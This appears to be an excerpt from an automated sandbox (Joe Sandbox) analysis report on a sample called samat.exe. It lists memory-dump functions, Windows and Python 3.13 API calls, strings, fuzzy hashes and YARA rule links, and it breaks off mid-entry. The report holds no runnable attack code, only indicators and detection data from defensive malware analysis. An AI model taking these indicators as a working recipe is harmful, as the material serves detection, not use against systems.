Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: f60843e89d54832239beb224f4aa960a89cfab9a1133ce52a4245f55b401e2a9
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 6C114F22B14B068AEB009B60EC453A973A8FB19758F440E36DA2D967A4DF78D1548351

Function 00007FF8A8AB4F54 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A8AB4F80
GetCurrentThreadId.KERNEL32 ref: 00007FF8A8AB4F8E
GetCurrentProcessId.KERNEL32 ref: 00007FF8A8AB4F9A
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A8AB4FAA

Memory Dump Source

Source File: 00000008.00000002.4569493021.00007FF8A88F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8A88F0000, based on PE: true

Associated: 00000008.00000002.4569432920.00007FF8A88F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8BA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8BC6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8BD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8BDF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8C21000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570500261.00007FF8A8DFF000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570583253.00007FF8A8E16000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570666618.00007FF8A8E19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570738167.00007FF8A8E1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570812645.00007FF8A8E1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570888014.00007FF8A8E1E000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4570990292.00007FF8A8E42000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571061708.00007FF8A8E43000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571137788.00007FF8A8E44000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571215845.00007FF8A8E46000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571297941.00007FF8A8E4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571422062.00007FF8A8E8F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571496577.00007FF8A8EC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571587745.00007FF8A8EEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571654980.00007FF8A8EEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571734205.00007FF8A8EEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571805350.00007FF8A8EF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571873329.00007FF8A8EF1000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4571944470.00007FF8A8EF3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4572018227.00007FF8A8F02000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4572018227.00007FF8A8F0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4572018227.00007FF8A8F2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.4572228737.00007FF8A8F30000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8a88f0000_samat.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: fe63b84064a5ce4d74b8ca480f490018c065660e782260b98ef3b250c9bc7566
Instruction ID: db877f699217190f7e356f6f86d3108e54df6ad0c22b67b840bf8713f03e0b31
Opcode Fuzzy Hash: fe63b84064a5ce4d74b8ca480f490018c065660e782260b98ef3b250c9bc7566
Instruction Fuzzy Hash: 16114C26B15F019AEB00CF60E8542A833A4FB19798F440E31DA2D877A4DF78E559C354

Function 00007FF8B7E84AA0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E84AC4
memset.VCRUNTIME140 ref: 00007FF8B7E84AD6
memset.VCRUNTIME140 ref: 00007FF8B7E84AF9
_Py_NewReference.PYTHON313 ref: 00007FF8B7E84B09

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: memset$Referencemalloc
String ID:
API String ID: 3353409452-0
Opcode ID: bbf950d98bc3cd11b916acf723f5275b2f468ca755442ab4f61e8457fbf862c0
Instruction ID: 806a6a6a74a9a75ce54b0b3713388b2cc54b8ff793076d80b2b0484899ae12a3
Opcode Fuzzy Hash: bbf950d98bc3cd11b916acf723f5275b2f468ca755442ab4f61e8457fbf862c0
Instruction Fuzzy Hash: E3012422A24B9592EB04CF6AE44002E7761FF88FC4B495039EB1D87729EF3DC462C784

Function 00007FF8B7E894D0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313 ref: 00007FF8B7E894F3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E894FC
memset.VCRUNTIME140 ref: 00007FF8B7E89513
memcpy.VCRUNTIME140 ref: 00007FF8B7E8952E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Referencemallocmemcpymemset
String ID:
API String ID: 1282408338-0
Opcode ID: 73095b53417423003ff8c3720ff8871ddab7b9a8b5b7f12efa74452b125d15c7
Instruction ID: 2da0647b2014f483e3aa3ee3bba6ee18c721f5da84edc104adc6f9092ce4ab96
Opcode Fuzzy Hash: 73095b53417423003ff8c3720ff8871ddab7b9a8b5b7f12efa74452b125d15c7
Instruction Fuzzy Hash: 59F04F22B19B8181EB449B5AB84002DA360EF88FD0F888134EF5D57B2ADF3CD4928700

Function 00007FF8B7E843C0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313 ref: 00007FF8B7E843E8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E843F1
memset.VCRUNTIME140 ref: 00007FF8B7E84403
InitializeAcl.ADVAPI32 ref: 00007FF8B7E84411

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: InitializeReferencemallocmemset
String ID:
API String ID: 306314696-0
Opcode ID: 8eaef662fe11b7ed3f416aa89d04ef063d77837210d100f2d8329317cefc0958
Instruction ID: 8bb81e66ccd2adc724b5b952eb15fe60c8f1f35d3a69d5f929733f75a9c27939
Opcode Fuzzy Hash: 8eaef662fe11b7ed3f416aa89d04ef063d77837210d100f2d8329317cefc0958
Instruction Fuzzy Hash: 2CF03722A08B9186E700DB5AB84005DB364EF88FD0F548434EB4D43B29DF3CD5928744

Function 00007FF8B7E88B60 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313 ref: 00007FF8B7E88B7B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88B8D
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E88BA6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88BBE

Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurityfree$InitializeLengthReferencemalloc
String ID:
API String ID: 2992339461-0
Opcode ID: 3885bea4552c8b6a4a56223f5b7daa316118e0659c06125b2451a4d2c74a1f0f
Instruction ID: c83526621931a4706ef4dc8a0caf819e2672ab3355b982e36325f102934b9f01
Opcode Fuzzy Hash: 3885bea4552c8b6a4a56223f5b7daa316118e0659c06125b2451a4d2c74a1f0f
Instruction Fuzzy Hash: 82F09A22B08B0692EB449B5AF94437D63A1AF48FC0F588034DF4E47B65DF7DE0958300

Function 00007FF8B7E89550 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313 ref: 00007FF8B7E89570
GetLengthSid.ADVAPI32 ref: 00007FF8B7E89579
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E89583
CopySid.ADVAPI32 ref: 00007FF8B7E89595

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: CopyLengthReferencemalloc
String ID:
API String ID: 3624451276-0
Opcode ID: a89472044513ba651987c9a091f99ce9793c8cbcf630952da96ca9784dc25113
Instruction ID: 645979a92b179b036157fb30829777a46502ba775a38f2b5282333dc8aed6f67
Opcode Fuzzy Hash: a89472044513ba651987c9a091f99ce9793c8cbcf630952da96ca9784dc25113
Instruction Fuzzy Hash: 9EF0FE26B19B8192DB548B9AB94412DA7A5FF48FC0F544034EB5E43B68DF3CD4958700

Function 00007FF8B7E8C1C0 Relevance: 6.0, APIs: 4, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF8B7E8C1CC
PyThreadState_Delete.PYTHON313 ref: 00007FF8B7E8C1E3
TlsSetValue.KERNEL32 ref: 00007FF8B7E8C1F1
LocalFree.KERNEL32 ref: 00007FF8B7E8C1FA

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Value$DeleteFreeLocalState_Thread
String ID:
API String ID: 3706641815-0
Opcode ID: 8a2e063ff86a224c7f4f91bb71c4a4de6d4722a2c61b2448b33797f2fe0f29d8
Instruction ID: 553d96b8b328d11c5aa3316e3470e59fe59cac2faa1b5adf42c3b92a735ee12e
Opcode Fuzzy Hash: 8a2e063ff86a224c7f4f91bb71c4a4de6d4722a2c61b2448b33797f2fe0f29d8
Instruction Fuzzy Hash: 50F0C975A08B06C2FB589BAAF85433D23B0AF89FD1F584035DA0E063F1DE3CA884C600

Function 00007FF7E12E5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12E1760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E1793

_get_daylight.LIBCMT ref: 00007FF7E12E5C34
_get_daylight.LIBCMT ref: 00007FF7E12E5C45

Strings

?, xrefs: 00007FF7E12E5BC5

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction ID: 64fa262109a55f46b90cb0bb29926850b713b0a42e297736b0476290db06b84c
Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction Fuzzy Hash: 09419E56B2834142FB62A731DC13379E758EB80BA4F948236EE4D87AD9DFBCD0418B01

Function 00007FF7E12D9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D9046

Part of subcall function 00007FF7E12DA948: HeapFree.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7E12CCBA5), ref: 00007FF7E12D9064

Strings

C:\Users\user\AppData\Local\Temp\1008029001\samat.exe, xrefs: 00007FF7E12D9052

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
API String ID: 3580290477-3004328233
Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction ID: 5544536e54f649732cfc9ad443cc61b9a80f777ffa9e05f62b53230a93af300f
Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction Fuzzy Hash: 24419136B0861286EB15BF21D8422BCA398EB44794B95403BE94E43B85CFBDE4818322

Function 00007FF7E12DCC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7E12DCD4F
GetLastError.KERNEL32 ref: 00007FF7E12DCD71

Strings

U, xrefs: 00007FF7E12DCCFB

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 333f0d91c31fc5cb4db87eeaddf17072881df474e74a63838ce10eea95677d45
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: 3E41E533718A4181DB20AF25E8453AAA7A4FB88784FC44136EE4E87798DF7CD411C751

Function 00007FF8B8262AF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

_wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B8262B82

Strings

(idx>=1) && (idx<=10), xrefs: 00007FF8B8262B7B
src/AESNI.c, xrefs: 00007FF8B8262B74

Memory Dump Source

Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true

Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd

Similarity

API ID: _wassert
String ID: (idx>=1) && (idx<=10)$src/AESNI.c
API String ID: 3234217646-2495715787
Opcode ID: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
Instruction ID: 4c190fc5127ea1e958298275a700927f5c35dd763f0942ebed017587e6db1121
Opcode Fuzzy Hash: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
Instruction Fuzzy Hash: A721567390D3C24BD7034F75949909C7FA0EB96B90F99C1AAC38483642EAAC98CBC711

Function 00007FF7E12DF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7E12DF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7E12DF64A

Strings

:, xrefs: 00007FF7E12DF60E

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
Instruction ID: 3d4155d7d2cd958bd72502162b4ac7fdd9e655a56eb56c5e6449df122de90c34
Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
Instruction Fuzzy Hash: 26210B63B0828145EB20AB21D84536DB3A9FB84B48FC54037D65D43A94DFBCE5458BA6

Function 00007FF8B7E8A400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B7E89AB0: PyImport_ImportModule.PYTHON313 ref: 00007FF8B7E89AD1
Part of subcall function 00007FF8B7E89AB0: PyObject_GetAttrString.PYTHON313 ref: 00007FF8B7E89AED
Part of subcall function 00007FF8B7E89AB0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B04
Part of subcall function 00007FF8B7E89AB0: PyTuple_New.PYTHON313 ref: 00007FF8B7E89B11
Part of subcall function 00007FF8B7E89AB0: PyObject_CallMethod.PYTHON313 ref: 00007FF8B7E89B30
Part of subcall function 00007FF8B7E89AB0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B4B
Part of subcall function 00007FF8B7E89AB0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B66

PyObject_GetAttrString.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A444
_Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A4A8

Strings

max, xrefs: 00007FF8B7E8A439

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dealloc$Object_$AttrString$CallImportImport_MethodModuleTuple_
String ID: max
API String ID: 66079785-2641765001
Opcode ID: c7742cccba0b74eac24001ffb7e123acc52cb9acd810040e86681d1a68a09f60
Instruction ID: 4c5957d4a6b28adc87e853db6135c5bd57e0f6dedcea5f9d7e6f31aed064d4ff
Opcode Fuzzy Hash: c7742cccba0b74eac24001ffb7e123acc52cb9acd810040e86681d1a68a09f60
Instruction Fuzzy Hash: 54110626A0879692EB548F1AE54413DB3A1FF84FD5F484131EB9E06AA9EF3CE460C700

Function 00007FF8B7E89BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E89C02

Part of subcall function 00007FF8B7E86460: PyLong_AsLongLong.PYTHON313 ref: 00007FF8B7E86485
Part of subcall function 00007FF8B7E86460: PyErr_Occurred.PYTHON313 ref: 00007FF8B7E86494

FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E89C39

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Strings

FileTimeToSystemTime, xrefs: 00007FF8B7E89C45

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

